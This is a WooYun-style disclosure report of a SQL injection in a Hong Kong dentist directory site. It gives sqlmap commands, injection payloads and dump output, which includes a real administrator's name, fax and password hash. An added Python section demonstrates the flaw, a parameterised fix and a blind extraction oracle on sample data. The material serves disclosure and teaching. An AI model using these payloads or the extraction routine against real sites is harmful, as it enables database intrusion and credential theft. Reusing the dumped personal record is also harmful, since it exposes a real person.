Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0161700

Title: SQL injection vulnerability in 香港牙醫網 (Hong Kong region)

Vendor: 香港牙醫網

Author: 路人甲

Submitted: 2015-12-16 11:45

Fixed: 2016-01-28 17:10

Published: 2016-01-28 17:10

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed to a third-party partner organization (hkcert, Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-16: Details sent to the vendor, awaiting vendor handling
2015-12-18: Vendor confirmed; details visible to the vendor only
2015-12-28: Details disclosed to core white hats and relevant domain experts
2016-01-07: Details disclosed to regular white hats
2016-01-17: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public

Summary:

香港牙醫網 has a SQL injection vulnerability.

Details:

Test URL: http://**.**.**.**/index.php?actiontype=search&language=eng&dentist_name=hui&clinic_dist=2

sqlmap -r 3.txt -p clinic_dist


3.txt:
GET /index.php?actiontype=search&language=eng&dentist_name=hui&clinic_dist=222%27%20or%20(select%201)%20and%20%271%27=%271 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=34d7102b2a211b4e59ccc39880963bcf
Connection: keep-alive


sqlmap -r 3.txt -p clinic_dist -D hkdentis_aosDBdentist -T hkdentists_users --dump

Proof:

---
Parameter: clinic_dist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' AND 4779=4779 AND 'UBUb'='UBUb
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' AND (SELECT * FROM (SELECT(SLEEP(5)))emwE) AND 'Ibdz'='Ibdz
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: actiontype=search&language=eng&dentist_name=hui&clinic_dist=222' or (select 1) and '1'='1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a707671,0x586f68664d4d4c597870,0x7170706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: Apache
back-end DBMS: MySQL 5.0.12
current user: 'aosDBdentist@localhost'
current database: 'hkdentis_aosDBdentist'
hostname: '**.**.**.**'
current user is DBA: False
database management system users [1]:
[*] 'aosDBdentist'@'localhost'
back-end DBMS: MySQL 5.0.12
Database: hkdentis_aosDBdentist
[12 tables]
+--------------------------+
| aos_directory_dchk |
| aos_hk_area |
| hkdentists_advertisement |
| hkdentists_clinic |
| hkdentists_dentist_quali |
| hkdentists_dentists |
| hkdentists_district |
| hkdentists_documents |
| hkdentists_licenses |
| hkdentists_qualification |
| hkdentists_searchlog |
| hkdentists_users |
+--------------------------+
web application technology: Apache
back-end DBMS: MySQL 5.0.12
Database: hkdentis_aosDBdentist
Table: hkdentists_users
[17 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| address1 | varchar(100) |
| address2 | varchar(100) |
| city | varchar(50) |
| email | varchar(50) |
| fax | varchar(30) |
| firstname | varchar(50) |
| id | int(11) |
| jobtitle | varchar(50) |
| last_login | int(11) |
| lastname | varchar(50) |
| login_name | varchar(50) |
| mobile | varchar(30) |
| password | varchar(50) |
| phone | varchar(30) |
| role | tinyint(1) |
| status | tinyint(4) |
| title | varchar(10) |
+------------+--------------+
sqlmap resumed the following injection point(s) from stored session (the same three injection points on clinic_dist listed above):
web application technology: Apache
back-end DBMS: MySQL 5.0.12
Database: hkdentis_aosDBdentist
Table: hkdentists_users
[1 entry]
+----+----------+-----------+------+-------+---------+---------------------+--------+---------+----------+----------+----------+------------+----------------------------------+-----------+------------+------------+
| id | fax | city | role | title | phone | email | status | mobile | address1 | address2 | lastname | jobtitle | password | firstname | login_name | last_login |
+----+----------+-----------+------+-------+---------+---------------------+--------+---------+----------+----------+----------+------------+----------------------------------+-----------+------------+------------+
| 1 | 30072787 | Hong Kong | 1 | Mr. | <blank> | chester@**.**.**.** | 1 | <blank> | <blank> | <blank> | Cheng | Programmer | f4d0fcce6d1c8bf3bd19ac39da0bfed6 | Chester | admin | 1449221493 |
+----+----------+-----------+------+-------+---------+---------------------+--------+---------+----------+----------+----------+------------+----------------------------------+-----------+------------+------------+

Fix suggestion:

Add input filtering.

Copyright notice: credit 路人甲@乌云 when reposting.
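The report shows the reporter's request file (whose clinic_dist value already carries the prefix `222' or (select 1) and '1'='1`) and sqlmap's boolean-based blind payload built on top of it, but not the server-side code that makes the injection work. The following is an added example, not the reporter's code and not the site's index.php: a hypothetical search handler that splices clinic_dist into the SQL text the way the report implies, the same handler with bound parameters, and a small boolean oracle that replays the report's payload shape to recover a value character by character, which is what sqlmap's boolean-based blind mode does once it has a true/false signal. It runs against an in-memory SQLite database with constructed rows; the table name hkdentists_dentists is taken from the report's table list, the columns and data are assumptions, and the target's MySQL `SLEEP(5)` time-based probe is not reproduced. The OR/AND precedence that the payload relies on is the same in SQLite and MySQL.

```python
import sqlite3

# Constructed sample data for an in-memory SQLite database (not the real
# hkdentis_aosDBdentist schema; only the table name echoes the report).
# clinic_dist is stored as TEXT because the injected payload closes a
# single-quoted string in the application's query.
SAMPLE_ROWS = [
    (1, "Hui Ka Wing", "2"),
    (2, "Hui Mei Ling", "5"),
    (3, "Chan Tai Man", "2"),
]

# The clinic_dist value from the report's request file, URL-decoded.
REPORT_PAYLOAD = "222' or (select 1) and '1'='1"


def make_db():
    """Create the in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE hkdentists_dentists "
        "(id INTEGER PRIMARY KEY, dentist_name TEXT, clinic_dist TEXT)"
    )
    conn.executemany("INSERT INTO hkdentists_dentists VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, dentist_name, clinic_dist):
    """Hypothetical vulnerable handler: request parameters are spliced into
    the SQL text, so a quote in clinic_dist changes the query structure.
    With REPORT_PAYLOAD the WHERE clause becomes
    (name LIKE ... AND clinic_dist = '222') OR ((select 1) AND '1'='1'),
    which is true for every row."""
    sql = (
        "SELECT id, dentist_name FROM hkdentists_dentists "
        "WHERE dentist_name LIKE '%" + dentist_name + "%' "
        "AND clinic_dist = '" + clinic_dist + "'"
    )
    return conn.execute(sql).fetchall()


def search_fixed(conn, dentist_name, clinic_dist):
    """Hardened handler: the same query with bound parameters. The driver
    sends the values separately from the SQL text, so the payload is
    compared literally against clinic_dist and matches no row."""
    sql = (
        "SELECT id, dentist_name FROM hkdentists_dentists "
        "WHERE dentist_name LIKE ? AND clinic_dist = ?"
    )
    return conn.execute(sql, ("%" + dentist_name + "%", clinic_dist)).fetchall()


def blind_probe(conn, condition):
    """Boolean oracle in the shape of sqlmap's payload from the report:
    the reporter's prefix, then an injected condition, then a string
    comparison that consumes the application's trailing quote. Returns
    True when the page would show results, i.e. the condition held."""
    payload = REPORT_PAYLOAD + "' AND " + condition + " AND 'UBUb'='UBUb"
    return len(search_vulnerable(conn, "hui", payload)) > 0


def extract_blind(conn, scalar_sql, max_len=32):
    """Recover the string value of scalar_sql one character at a time
    using only the true/false oracle. Stops at the first position where
    no alphabet character matches (end of the string)."""
    alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_@. "
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = "substr((%s),%d,1)='%s'" % (scalar_sql, pos, ch)
            if blind_probe(conn, cond):
                recovered += ch
                break
        else:
            break  # no character matched: end of value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("legit search    :", search_vulnerable(db, "hui", "2"))
    print("injected search :", search_vulnerable(db, "hui", REPORT_PAYLOAD))
    print("fixed + payload :", search_fixed(db, "hui", REPORT_PAYLOAD))
    print("oracle 4779=4779:", blind_probe(db, "4779=4779"))
    print("oracle 4779=4780:", blind_probe(db, "4779=4780"))
    print("blind extract   :", extract_blind(
        db, "select dentist_name from hkdentists_dentists where id=1"))
```

A non-existent district 222 returns every dentist through the vulnerable handler and nothing through the parameterised one, and flipping `4779=4779` to `4779=4780` flips the result set between all rows and none, which is the signal sqlmap's "AND boolean-based blind" detection reports above. The durable fix for the site is the bound-parameter form (mysqli or PDO prepared statements in PHP) rather than filtering alone, because filtering has to anticipate every quoting trick while a bound parameter never reaches the SQL parser as syntax.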


Vulnerability response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2015-12-18 18:19

Vendor reply:

The incident has been reported to the relevant organization.

Latest status:

None